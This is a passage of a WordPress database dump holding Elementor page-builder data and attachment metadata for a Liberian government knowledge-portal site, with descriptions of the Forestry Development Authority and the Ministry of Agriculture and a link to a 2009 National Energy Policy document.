reduction<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13463,2165,'_pods_attached_document','a:1:{i:0;i:2170;}'),(13465,2173,'_elementor_edit_mode','builder'),(13466,2173,'_elementor_template_type','wp-post'),(13467,2173,'_elementor_version','2.7.5'),(13468,2173,'_wp_page_template','default'),(13469,2173,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f335f32\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"cb943b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb32b63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Coming up\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13473,2175,'_elementor_controls_usage','a:0:{}'),(13475,2175,'_ca_post_type','1586'),(13476,2174,'_edit_last','1'),(13477,2174,'_elementor_controls_usage','a:0:{}'),(13478,2174,'_ca_handle','0'),(13479,2174,'_ca_host','sidebar'),(13480,2174,'_ca_merge_pos','0'),(13481,2174,'_edit_lock','1573758068:1'),(13482,2177,'_elementor_controls_usage','a:0:{}'),(13484,2177,'_ca_post_type','1600'),(13485,2176,'_edit_last','1'),(13486,2176,'_elementor_controls_usage','a:0:{}'),(13487,2176,'_ca_handle','0'),(13488,2176,'_ca_host','sidebar'),(13489,2176,'_ca_merge_pos','0'),(13490,2176,'_edit_lock','1573758049:1'),(13491,2178,'_elementor_controls_usage','a:0:{}'),(13492,2178,'by','MME'),(13493,2178,'year','2009'),(13494,2178,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/National-Energy-Policy-2009.pdf'),(13495,2178,'_pods_cover_image','a:1:{i:0;i:573;}'),(13496,2178,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(13501,2178,'_dp_original','2159'),(13502,2178,'_edit_lock','1670324217:42'),(13503,2178,'_edit_last','42'),(13504,2179,'_wp_attached_file','2019/11/National-Energy-Policy-2009.pdf'),(13506,2178,'_pods_attached_document','a:1:{i:0;i:2179;}'),(13508,2180,'_wp_attached_file','2019/11/fda_logo.png'),(13509,2180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:654;s:6:\"height\";i:683;s:4:\"file\";s:20:\"2019/11/fda_logo.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"fda_logo-287x300.png\";s:5:\"width\";i:287;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"fda_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13512,2182,'_wp_attached_file','2019/11/moa_logo.png'),(13513,2182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:262;s:6:\"height\";i:192;s:4:\"file\";s:20:\"2019/11/moa_logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"moa_logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13515,2183,'_elementor_edit_mode','builder'),(13516,2183,'_elementor_template_type','wp-post'),(13517,2183,'_elementor_version','2.7.5'),(13518,2183,'_wp_page_template','default'),(13519,2183,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA\\u00a0creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae041f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13522,2184,'_elementor_edit_mode','builder'),(13523,2184,'_elementor_template_type','wp-post'),(13524,2184,'_elementor_version','2.7.5'),(13525,2184,'_wp_page_template','default'),(13526,2184,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA\\u00a0creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13528,2185,'_elementor_edit_mode','builder'),(13529,2185,'_elementor_template_type','wp-post'),(13530,2185,'_elementor_version','2.7.5'),(13531,2185,'_wp_page_template','default'),(13532,2185,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.\\n<h4>Mandate<\\/h4>\\nThe Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in 